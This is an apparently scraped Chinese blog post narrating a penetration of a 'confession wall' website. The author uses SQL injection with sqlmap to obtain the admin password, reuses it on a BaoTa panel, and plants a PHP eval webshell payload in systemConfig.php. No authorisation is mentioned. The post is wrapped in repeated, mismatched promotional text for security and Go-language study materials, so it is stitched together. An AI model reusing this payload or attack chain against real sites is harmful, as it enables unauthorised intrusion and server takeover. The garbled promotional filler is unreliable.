既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
扫一下这个站的端口,只发现一个宝塔登陆页面
开始对表白墙系统进行常规渗透,先尝试了SQL注入,发现’ "等都被转义了,尝试编码以及宽字节注入未果
后台爆破了一波未果,正当我觉得没搞头的时候,Burp的xia SQL插件给我返回了一个“You have an error in your SQL syntax”(WTF ?,这个故事告诉我们,SQL注入多试几个点,有些功能可能过滤不全)
直接sqlmap一把梭
可惜不是dba,不管了,先把后台密码搞到
这md5真够让人无语的
进入后台,文件上传没有绕过去(白名单),我是真的菜啊
等等,刚才不是发现了一个宝塔登陆界面吗?试试同口令。。。呵呵呵
先看看网站源码,发现systemConfig.php中的内容有点眼熟
这不就是后台的基本设置吗,笑死,没想通为什么开发要把这些信息保存在php中
有经验的老师傅可能已经知道接下来怎么做了
既然这些参数是可控的,那直接插入php代码进去不就getshell了
经过一番尝试(我就尝试了两次),在基本设置中任意位置插入payload:');@eval($_POST[x]);//
点击保存,再次查看网页源码,发现php一句话插入成功
然而,所有的页面都引入了systemConfig.php,因此在任意位置都可以执行webshell
现在执行一下phpinfo试试水
坚守底线,点到为止
`黑客&网络安全如何学习
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。
1.学习路线图
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。
2.视频教程
网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上Go语言开发知识点,真正体系化!
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新
!**
由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新